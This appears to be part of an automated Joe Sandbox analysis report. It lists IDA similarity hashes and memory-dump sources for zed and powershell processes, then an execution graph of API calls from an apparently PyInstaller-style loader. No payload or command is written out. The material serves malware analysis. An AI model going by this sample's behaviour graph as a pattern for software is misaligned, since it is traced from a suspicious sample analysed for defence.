                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_FromUnicode_
                                                                                                                                                                                                                                                • String ID: no such name
                                                                                                                                                                                                                                                • API String ID: 3678473424-4211486178
                                                                                                                                                                                                                                                • Opcode ID: 3005c2e76ccdbfdbb1504f9de79cdf15a2dc4c168f6a8fbb72cf26d2d18b7585
                                                                                                                                                                                                                                                • Instruction ID: 613532c43a7a467e47fde4ea9dcd151a1e1a117146fe0afc268c19d4d620d6ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3005c2e76ccdbfdbb1504f9de79cdf15a2dc4c168f6a8fbb72cf26d2d18b7585
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B014471B1AA42A1FBB99B25E8643FD6390BF9974DF406071DA4E46390EF2CF005E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFD8A252513), ref: 00007FFD8A2525A6
                                                                                                                                                                                                                                                • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFD8A252513), ref: 00007FFD8A2525D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.4747789394.00007FFD8A251000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFD8A250000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747702381.00007FFD8A250000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A255000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2B2000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A2FE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A302000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A307000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4747871037.00007FFD8A35F000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748544856.00007FFD8A362000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.4748623207.00007FFD8A364000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd8a250000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Object_$Track
                                                                                                                                                                                                                                                • String ID: 3.2.0
                                                                                                                                                                                                                                                • API String ID: 16854473-1786766648
                                                                                                                                                                                                                                                • Opcode ID: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                                                • Instruction ID: 793cffce62f1c7021e5417c504874a4232992ec3f3613172586f13eef54ce41f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E0C924B0BF06B1EB6D8B15A8641AC23A4BF08718B5421B5CD4D02364EF3CE554E340
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.3175764681.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffd344b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a00049dfe5dd005261e2b14d1d192b4fd4c1a1a4cfd75d74c5eae5e7a58b78be
                                                                                                                                                                                                                                                • Instruction ID: 40a86309ad293fa70d6725b4210172424167aff6b07603056fb6b30e956014e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a00049dfe5dd005261e2b14d1d192b4fd4c1a1a4cfd75d74c5eae5e7a58b78be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E1A230A08A4E4FEBA8DF28C8657E977D1FF55310F14427EE84DC7295CEB8A8458B81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.3175764681.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffd344b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                • Instruction ID: 1699bbb57386d1985944c9a7e1a32b731d80d733cc1faa7b0f8f8d1503d5ec0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C01A73020CB0C4FD744EF0CE051AA6B3E0FB85324F50052DE58AC3661DB36E882CB45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000011.00000002.3209708531.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 57529de6d153f8161c70c828937fdddf1070cbfeb7bbdfebd6e03b8e2d34ea6b
                                                                                                                                                                                                                                                • Instruction ID: 8c37d900be9b6fef94effc310f0ec211f4675c46ad06d2b42a8fa43547d9ac88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57529de6d153f8161c70c828937fdddf1070cbfeb7bbdfebd6e03b8e2d34ea6b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5E1B330608A4E4FEBA8DF28C8657E977D1FF55310F14427EE84DC7295DEB898458B81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000011.00000002.3209708531.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                • Instruction ID: 1699bbb57386d1985944c9a7e1a32b731d80d733cc1faa7b0f8f8d1503d5ec0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C01A73020CB0C4FD744EF0CE051AA6B3E0FB85324F50052DE58AC3661DB36E882CB45

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:9.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                Total number of Limit Nodes:42
                                                                                                                                                                                                                                                execution_graph 17014 7ff78c9bb040 17015 7ff78c9bb06e 17014->17015 17016 7ff78c9bb055 17014->17016 17016->17015 17019 7ff78c9ce664 17016->17019 17020 7ff78c9ce6af 17019->17020 17024 7ff78c9ce673 _set_fmode 17019->17024 17029 7ff78c9c5de8 17020->17029 17021 7ff78c9ce696 HeapAlloc 17023 7ff78c9bb0ce 17021->17023 17021->17024 17024->17020 17024->17021 17026 7ff78c9d47a0 17024->17026 17032 7ff78c9d47e0 17026->17032 17038 7ff78c9cc168 GetLastError 17029->17038 17031 7ff78c9c5df1 17031->17023 17037 7ff78c9d14e8 EnterCriticalSection 17032->17037 17039 7ff78c9cc18c 17038->17039 17040 7ff78c9cc1a9 FlsSetValue 17038->17040 17039->17040 17052 7ff78c9cc199 SetLastError 17039->17052 17041 7ff78c9cc1bb 17040->17041 17040->17052 17055 7ff78c9cfda4 17041->17055 17044 7ff78c9cc1ca 17045 7ff78c9cc1e8 FlsSetValue 17044->17045 17046 7ff78c9cc1d8 FlsSetValue 17044->17046 17047 7ff78c9cc1f4 FlsSetValue 17045->17047 17048 7ff78c9cc206 17045->17048 17049 7ff78c9cc1e1 17046->17049 17047->17049 17068 7ff78c9cbd9c 17048->17068 17062 7ff78c9cb404 17049->17062 17052->17031 17060 7ff78c9cfdb5 _set_fmode 17055->17060 17056 7ff78c9cfe06 17059 7ff78c9c5de8 _set_fmode 10 API calls 17056->17059 17057 7ff78c9cfdea HeapAlloc 17058 7ff78c9cfe04 17057->17058 17057->17060 17058->17044 17059->17058 17060->17056 17060->17057 17061 7ff78c9d47a0 _set_fmode 2 API calls 17060->17061 17061->17060 17063 7ff78c9cb409 RtlFreeHeap 17062->17063 17067 7ff78c9cb438 17062->17067 17064 7ff78c9cb424 GetLastError 17063->17064 17063->17067 17065 7ff78c9cb431 Concurrency::details::SchedulerProxy::DeleteThis 17064->17065 17066 7ff78c9c5de8 _set_fmode 9 API calls 17065->17066 17066->17067 17067->17052 17073 7ff78c9cbc74 17068->17073 17085 7ff78c9d14e8 EnterCriticalSection 17073->17085 20242 7ff78c9d28c0 20253 7ff78c9d85f4 20242->20253 20254 7ff78c9d8601 20253->20254 20255 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20254->20255 20256 7ff78c9d861d 20254->20256 20255->20254 20257 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20256->20257 20258 7ff78c9d28c9 20256->20258 20257->20256 20259 7ff78c9d14e8 EnterCriticalSection 20258->20259 20170 7ff78c9ca839 20171 7ff78c9cb2f8 45 API calls 20170->20171 20172 7ff78c9ca83e 20171->20172 20173 7ff78c9ca865 GetModuleHandleW 20172->20173 20174 7ff78c9ca8af 20172->20174 20173->20174 20180 7ff78c9ca872 20173->20180 20182 7ff78c9ca73c 20174->20182 20180->20174 20196 7ff78c9ca960 GetModuleHandleExW 20180->20196 20202 7ff78c9d14e8 EnterCriticalSection 20182->20202 20197 7ff78c9ca994 GetProcAddress 20196->20197 20198 7ff78c9ca9bd 20196->20198 20199 7ff78c9ca9a6 20197->20199 20200 7ff78c9ca9c2 FreeLibrary 20198->20200 20201 7ff78c9ca9c9 20198->20201 20199->20198 20200->20201 20201->20174 21479 7ff78c9c6220 21480 7ff78c9c622b 21479->21480 21488 7ff78c9d04b4 21480->21488 21501 7ff78c9d14e8 EnterCriticalSection 21488->21501 17469 7ff78c9d0b9c 17470 7ff78c9d0d8e 17469->17470 17472 7ff78c9d0bde _isindst 17469->17472 17471 7ff78c9c5de8 _set_fmode 11 API calls 17470->17471 17489 7ff78c9d0d7e 17471->17489 17472->17470 17475 7ff78c9d0c5e _isindst 17472->17475 17473 7ff78c9bbab0 _log10_special 8 API calls 17474 7ff78c9d0da9 17473->17474 17490 7ff78c9d73a4 17475->17490 17480 7ff78c9d0dba 17482 7ff78c9cb7e4 _isindst 17 API calls 17480->17482 17484 7ff78c9d0dce 17482->17484 17487 7ff78c9d0cbb 17487->17489 17514 7ff78c9d73e8 17487->17514 17489->17473 17491 7ff78c9d73b3 17490->17491 17493 7ff78c9d0c7c 17490->17493 17521 7ff78c9d14e8 EnterCriticalSection 17491->17521 17496 7ff78c9d67a8 17493->17496 17497 7ff78c9d67b1 17496->17497 17498 7ff78c9d0c91 17496->17498 17499 7ff78c9c5de8 _set_fmode 11 API calls 17497->17499 17498->17480 17502 7ff78c9d67d8 17498->17502 17500 7ff78c9d67b6 17499->17500 17501 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17500->17501 17501->17498 17503 7ff78c9d67e1 17502->17503 17504 7ff78c9d0ca2 17502->17504 17505 7ff78c9c5de8 _set_fmode 11 API calls 17503->17505 17504->17480 17508 7ff78c9d6808 17504->17508 17506 7ff78c9d67e6 17505->17506 17507 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17506->17507 17507->17504 17509 7ff78c9d6811 17508->17509 17511 7ff78c9d0cb3 17508->17511 17510 7ff78c9c5de8 _set_fmode 11 API calls 17509->17510 17512 7ff78c9d6816 17510->17512 17511->17480 17511->17487 17513 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17512->17513 17513->17511 17522 7ff78c9d14e8 EnterCriticalSection 17514->17522 17523 7ff78c9bc19c 17544 7ff78c9bc37c 17523->17544 17526 7ff78c9bc2f3 17720 7ff78c9bc69c IsProcessorFeaturePresent 17526->17720 17527 7ff78c9bc1bd __scrt_acquire_startup_lock 17529 7ff78c9bc2fd 17527->17529 17531 7ff78c9bc1db __scrt_release_startup_lock 17527->17531 17530 7ff78c9bc69c 7 API calls 17529->17530 17533 7ff78c9bc308 __GetCurrentState 17530->17533 17532 7ff78c9bc200 17531->17532 17534 7ff78c9bc286 17531->17534 17709 7ff78c9caa04 17531->17709 17552 7ff78c9ca658 17534->17552 17537 7ff78c9bc28b 17558 7ff78c9b1000 17537->17558 17541 7ff78c9bc2af 17541->17533 17716 7ff78c9bc500 17541->17716 17545 7ff78c9bc384 17544->17545 17546 7ff78c9bc390 __scrt_dllmain_crt_thread_attach 17545->17546 17547 7ff78c9bc39d 17546->17547 17551 7ff78c9bc1b5 17546->17551 17727 7ff78c9cb2ac 17547->17727 17551->17526 17551->17527 17553 7ff78c9ca668 17552->17553 17555 7ff78c9ca67d 17552->17555 17553->17555 17770 7ff78c9ca0e8 17553->17770 17555->17537 17559 7ff78c9b2b80 17558->17559 17832 7ff78c9c6360 17559->17832 17561 7ff78c9b2bbc 17839 7ff78c9b2a70 17561->17839 17565 7ff78c9bbab0 _log10_special 8 API calls 17567 7ff78c9b30ec 17565->17567 17714 7ff78c9bc7ec GetModuleHandleW 17567->17714 17568 7ff78c9b2bfd 17999 7ff78c9b1c60 17568->17999 17569 7ff78c9b2cdb 18008 7ff78c9b39e0 17569->18008 17573 7ff78c9b2c1c 17911 7ff78c9b7c80 17573->17911 17574 7ff78c9b2d2a 18031 7ff78c9b1e50 17574->18031 17578 7ff78c9b2c4f 17585 7ff78c9b2c7b __std_exception_copy 17578->17585 18003 7ff78c9b7df0 17578->18003 17579 7ff78c9b2d1d 17580 7ff78c9b2d22 17579->17580 17581 7ff78c9b2d45 17579->17581 18027 7ff78c9bf544 17580->18027 17584 7ff78c9b1c60 49 API calls 17581->17584 17586 7ff78c9b2d64 17584->17586 17587 7ff78c9b7c80 14 API calls 17585->17587 17595 7ff78c9b2c9e __std_exception_copy 17585->17595 17590 7ff78c9b1930 115 API calls 17586->17590 17587->17595 17589 7ff78c9b2dcc 17591 7ff78c9b7df0 40 API calls 17589->17591 17592 7ff78c9b2d8e 17590->17592 17593 7ff78c9b2dd8 17591->17593 17592->17573 17594 7ff78c9b2d9e 17592->17594 17596 7ff78c9b7df0 40 API calls 17593->17596 17597 7ff78c9b1e50 81 API calls 17594->17597 17600 7ff78c9b2cce __std_exception_copy 17595->17600 18042 7ff78c9b7d90 17595->18042 17598 7ff78c9b2de4 17596->17598 17700 7ff78c9b2bc9 __std_exception_copy 17597->17700 17599 7ff78c9b7df0 40 API calls 17598->17599 17599->17600 17601 7ff78c9b7c80 14 API calls 17600->17601 17602 7ff78c9b2e04 17601->17602 17603 7ff78c9b2ef9 17602->17603 17604 7ff78c9b2e29 __std_exception_copy 17602->17604 17605 7ff78c9b1e50 81 API calls 17603->17605 17606 7ff78c9b7d90 40 API calls 17604->17606 17619 7ff78c9b2e6c 17604->17619 17605->17700 17606->17619 17607 7ff78c9b3033 18049 7ff78c9b8530 GetConsoleWindow 17607->18049 17608 7ff78c9b303a 17610 7ff78c9b3043 17608->17610 17611 7ff78c9b303e 17608->17611 17614 7ff78c9b7c80 14 API calls 17610->17614 18054 7ff78c9b86a0 GetConsoleWindow 17611->18054 17615 7ff78c9b304f __std_exception_copy 17614->17615 17616 7ff78c9b308a 17615->17616 17617 7ff78c9b3187 17615->17617 17620 7ff78c9b3094 17616->17620 17621 7ff78c9b311a 17616->17621 18059 7ff78c9b3900 17617->18059 17619->17607 17619->17608 17924 7ff78c9b8580 17620->17924 17623 7ff78c9b7c80 14 API calls 17621->17623 17626 7ff78c9b3126 17623->17626 17624 7ff78c9b3195 17627 7ff78c9b31b7 17624->17627 17628 7ff78c9b31ab 17624->17628 17629 7ff78c9b30a5 17626->17629 17632 7ff78c9b3133 17626->17632 17631 7ff78c9b1c60 49 API calls 17627->17631 18062 7ff78c9b3a50 17628->18062 17634 7ff78c9b1e50 81 API calls 17629->17634 17640 7ff78c9b310e __std_exception_copy 17631->17640 17635 7ff78c9b1c60 49 API calls 17632->17635 17634->17700 17638 7ff78c9b3151 17635->17638 17636 7ff78c9b3202 17974 7ff78c9b88f0 17636->17974 17638->17640 17641 7ff78c9b3158 17638->17641 17640->17636 17642 7ff78c9b31ed LoadLibraryExW 17640->17642 17644 7ff78c9b1e50 81 API calls 17641->17644 17642->17636 17643 7ff78c9b3215 SetDllDirectoryW 17646 7ff78c9b3248 17643->17646 17698 7ff78c9b3299 17643->17698 17644->17700 17647 7ff78c9b7c80 14 API calls 17646->17647 17659 7ff78c9b3254 __std_exception_copy 17647->17659 17648 7ff78c9b3437 17649 7ff78c9b3442 17648->17649 17650 7ff78c9b3449 17648->17650 17652 7ff78c9b8530 4 API calls 17649->17652 17653 7ff78c9b3452 17650->17653 17654 7ff78c9b344d 17650->17654 17651 7ff78c9b335a 17979 7ff78c9b2780 17651->17979 17657 7ff78c9b3447 17652->17657 18139 7ff78c9b2720 17653->18139 17658 7ff78c9b86a0 4 API calls 17654->17658 17657->17653 17658->17653 17661 7ff78c9b3331 17659->17661 17666 7ff78c9b328d 17659->17666 17665 7ff78c9b7d90 40 API calls 17661->17665 17665->17698 17666->17698 18065 7ff78c9b6210 17666->18065 17698->17648 17698->17651 17700->17565 17710 7ff78c9caa1b 17709->17710 17711 7ff78c9caa3c 17709->17711 17710->17534 20165 7ff78c9cb2f8 17711->20165 17715 7ff78c9bc7fd 17714->17715 17715->17541 17718 7ff78c9bc511 17716->17718 17717 7ff78c9bc2c6 17717->17532 17718->17717 17719 7ff78c9bcdb8 7 API calls 17718->17719 17719->17717 17721 7ff78c9bc6c2 __GetCurrentState memcpy_s 17720->17721 17722 7ff78c9bc6e1 RtlCaptureContext RtlLookupFunctionEntry 17721->17722 17723 7ff78c9bc746 memcpy_s 17722->17723 17724 7ff78c9bc70a RtlVirtualUnwind 17722->17724 17725 7ff78c9bc778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17723->17725 17724->17723 17726 7ff78c9bc7c6 __GetCurrentState 17725->17726 17726->17529 17728 7ff78c9d46bc 17727->17728 17729 7ff78c9bc3a2 17728->17729 17737 7ff78c9cd3c0 17728->17737 17729->17551 17731 7ff78c9bcdb8 17729->17731 17732 7ff78c9bcdc0 17731->17732 17733 7ff78c9bcdca 17731->17733 17749 7ff78c9bd154 17732->17749 17733->17551 17748 7ff78c9d14e8 EnterCriticalSection 17737->17748 17750 7ff78c9bcdc5 17749->17750 17751 7ff78c9bd163 17749->17751 17753 7ff78c9bd1c0 17750->17753 17757 7ff78c9bd390 17751->17757 17754 7ff78c9bd1eb 17753->17754 17755 7ff78c9bd1ef 17754->17755 17756 7ff78c9bd1ce DeleteCriticalSection 17754->17756 17755->17733 17756->17754 17761 7ff78c9bd1f8 17757->17761 17762 7ff78c9bd2e2 TlsFree 17761->17762 17768 7ff78c9bd23c __vcrt_FlsAlloc 17761->17768 17763 7ff78c9bd26a LoadLibraryExW 17765 7ff78c9bd309 17763->17765 17766 7ff78c9bd28b GetLastError 17763->17766 17764 7ff78c9bd329 GetProcAddress 17764->17762 17765->17764 17767 7ff78c9bd320 FreeLibrary 17765->17767 17766->17768 17767->17764 17768->17762 17768->17763 17768->17764 17769 7ff78c9bd2ad LoadLibraryExW 17768->17769 17769->17765 17769->17768 17771 7ff78c9ca101 17770->17771 17778 7ff78c9ca0fd 17770->17778 17791 7ff78c9d3c4c GetEnvironmentStringsW 17771->17791 17774 7ff78c9ca10e 17776 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17774->17776 17775 7ff78c9ca11a 17798 7ff78c9ca268 17775->17798 17776->17778 17778->17555 17783 7ff78c9ca4a8 17778->17783 17780 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17781 7ff78c9ca141 17780->17781 17782 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17781->17782 17782->17778 17784 7ff78c9ca4cb 17783->17784 17789 7ff78c9ca4e2 17783->17789 17784->17555 17785 7ff78c9d0ab0 MultiByteToWideChar _fread_nolock 17785->17789 17786 7ff78c9cfda4 _set_fmode 11 API calls 17786->17789 17787 7ff78c9ca556 17788 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17787->17788 17788->17784 17789->17784 17789->17785 17789->17786 17789->17787 17790 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17789->17790 17790->17789 17792 7ff78c9ca106 17791->17792 17793 7ff78c9d3c70 17791->17793 17792->17774 17792->17775 17794 7ff78c9ce664 _fread_nolock 12 API calls 17793->17794 17795 7ff78c9d3ca7 memcpy_s 17794->17795 17796 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17795->17796 17797 7ff78c9d3cc7 FreeEnvironmentStringsW 17796->17797 17797->17792 17799 7ff78c9ca290 17798->17799 17800 7ff78c9cfda4 _set_fmode 11 API calls 17799->17800 17812 7ff78c9ca2cb 17800->17812 17801 7ff78c9ca2d3 17802 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17801->17802 17803 7ff78c9ca122 17802->17803 17803->17780 17804 7ff78c9ca34d 17805 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17804->17805 17805->17803 17806 7ff78c9cfda4 _set_fmode 11 API calls 17806->17812 17807 7ff78c9ca33c 17826 7ff78c9ca384 17807->17826 17811 7ff78c9ca370 17814 7ff78c9cb7e4 _isindst 17 API calls 17811->17814 17812->17801 17812->17804 17812->17806 17812->17807 17812->17811 17815 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17812->17815 17817 7ff78c9d1684 17812->17817 17813 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17813->17801 17816 7ff78c9ca382 17814->17816 17815->17812 17818 7ff78c9d1691 17817->17818 17819 7ff78c9d169b 17817->17819 17818->17819 17824 7ff78c9d16b7 17818->17824 17820 7ff78c9c5de8 _set_fmode 11 API calls 17819->17820 17821 7ff78c9d16a3 17820->17821 17822 7ff78c9cb7c4 _invalid_parameter_noinfo 37 API calls 17821->17822 17823 7ff78c9d16af 17822->17823 17823->17812 17824->17823 17825 7ff78c9c5de8 _set_fmode 11 API calls 17824->17825 17825->17821 17827 7ff78c9ca389 17826->17827 17831 7ff78c9ca344 17826->17831 17828 7ff78c9ca3b2 17827->17828 17829 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17827->17829 17830 7ff78c9cb404 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17828->17830 17829->17827 17830->17831 17831->17813 17835 7ff78c9d0690 17832->17835 17833 7ff78c9d06e3 17834 7ff78c9cb6f8 _invalid_parameter_noinfo 37 API calls 17833->17834 17838 7ff78c9d070c 17834->17838 17835->17833 17836 7ff78c9d0736 17835->17836 18152 7ff78c9d0568 17836->18152 17838->17561 18160 7ff78c9bbdb0 17839->18160 17842 7ff78c9b2ad0 18162 7ff78c9b87e0 FindFirstFileExW 17842->18162 17843 7ff78c9b2aab GetLastError 18167 7ff78c9b2310 17843->18167 17847 7ff78c9b2ac6 17851 7ff78c9bbab0 _log10_special 8 API calls 17847->17851 17848 7ff78c9b2ae3 18184 7ff78c9b8860 CreateFileW 17848->18184 17849 7ff78c9b2b3d 18197 7ff78c9b89a0 17849->18197 17854 7ff78c9b2b75 17851->17854 17854->17700 17861 7ff78c9b1930 17854->17861 17855 7ff78c9b2b4b 17855->17847 17859 7ff78c9b1f30 78 API calls 17855->17859 17856 7ff78c9b2af4 18187 7ff78c9b1f30 17856->18187 17857 7ff78c9b2b0c __vcrt_FlsAlloc 17857->17849 17859->17847 17862 7ff78c9b39e0 108 API calls 17861->17862 17863 7ff78c9b1965 17862->17863 17864 7ff78c9b1c23 17863->17864 17866 7ff78c9b73e0 83 API calls 17863->17866 17865 7ff78c9bbab0 _log10_special 8 API calls 17864->17865 17868 7ff78c9b1c3e 17865->17868 17867 7ff78c9b19ab 17866->17867 17910 7ff78c9b19e3 17867->17910 18573 7ff78c9bfbcc 17867->18573 17868->17568 17868->17569 17870 7ff78c9bf544 74 API calls 17870->17864 17871 7ff78c9b19c5 17872 7ff78c9b19c9 17871->17872 17873 7ff78c9b19e8 17871->17873 17874 7ff78c9c5de8 _set_fmode 11 API calls 17872->17874 18577 7ff78c9bf894 17873->18577 17876 7ff78c9b19ce 17874->17876 18580 7ff78c9b2020 17876->18580 17879 7ff78c9b1a25 17883 7ff78c9b1a5b 17879->17883 17884 7ff78c9b1a3c 17879->17884 17880 7ff78c9b1a06 17881 7ff78c9c5de8 _set_fmode 11 API calls 17880->17881 17882 7ff78c9b1a0b 17881->17882 17885 7ff78c9b2020 87 API calls 17882->17885 17887 7ff78c9b1c60 49 API calls 17883->17887 17886 7ff78c9c5de8 _set_fmode 11 API calls 17884->17886 17885->17910 17888 7ff78c9b1a41 17886->17888 17889 7ff78c9b1a72 17887->17889 17890 7ff78c9b2020 87 API calls 17888->17890 17891 7ff78c9b1c60 49 API calls 17889->17891 17890->17910 17892 7ff78c9b1abd 17891->17892 17893 7ff78c9bfbcc 73 API calls 17892->17893 17894 7ff78c9b1ae1 17893->17894 17895 7ff78c9b1b15 17894->17895 17896 7ff78c9b1af6 17894->17896 17898 7ff78c9bf894 _fread_nolock 53 API calls 17895->17898 17897 7ff78c9c5de8 _set_fmode 11 API calls 17896->17897 17899 7ff78c9b1afb 17897->17899 17900 7ff78c9b1b2a 17898->17900 17901 7ff78c9b2020 87 API calls 17899->17901 17902 7ff78c9b1b4f 17900->17902 17903 7ff78c9b1b30 17900->17903 17901->17910 18595 7ff78c9bf608 17902->18595 17905 7ff78c9c5de8 _set_fmode 11 API calls 17903->17905 17906 7ff78c9b1b35 17905->17906 17908 7ff78c9b2020 87 API calls 17906->17908 17908->17910 17909 7ff78c9b1e50 81 API calls 17909->17910 17910->17870 17912 7ff78c9b7c8a 17911->17912 17913 7ff78c9b88f0 2 API calls 17912->17913 17914 7ff78c9b7ca9 GetEnvironmentVariableW 17913->17914 17915 7ff78c9b7d12 17914->17915 17916 7ff78c9b7cc6 ExpandEnvironmentStringsW 17914->17916 17918 7ff78c9bbab0 _log10_special 8 API calls 17915->17918 17916->17915 17917 7ff78c9b7ce8 17916->17917 17920 7ff78c9b89a0 2 API calls 17917->17920 17919 7ff78c9b7d24 17918->17919 17919->17578 17921 7ff78c9b7cfa 17920->17921 17922 7ff78c9bbab0 _log10_special 8 API calls 17921->17922 17923 7ff78c9b7d0a 17922->17923 17923->17578 17925 7ff78c9b8595 17924->17925 18859 7ff78c9b79c0 GetCurrentProcess OpenProcessToken 17925->18859 17928 7ff78c9b79c0 7 API calls 17929 7ff78c9b85c1 17928->17929 17930 7ff78c9b85f4 17929->17930 17931 7ff78c9b85da 17929->17931 17933 7ff78c9b1d50 48 API calls 17930->17933 17932 7ff78c9b1d50 48 API calls 17931->17932 17934 7ff78c9b85f2 17932->17934 17935 7ff78c9b8607 LocalFree LocalFree 17933->17935 17934->17935 17936 7ff78c9b8623 17935->17936 17938 7ff78c9b862f 17935->17938 18869 7ff78c9b2220 17936->18869 17939 7ff78c9bbab0 _log10_special 8 API calls 17938->17939 17940 7ff78c9b3099 17939->17940 17940->17629 17941 7ff78c9b7ab0 17940->17941 17942 7ff78c9b7ac8 17941->17942 17943 7ff78c9b7b4a GetTempPathW GetCurrentProcessId 17942->17943 17944 7ff78c9b7aec 17942->17944 17975 7ff78c9b8912 MultiByteToWideChar 17974->17975 17978 7ff78c9b8936 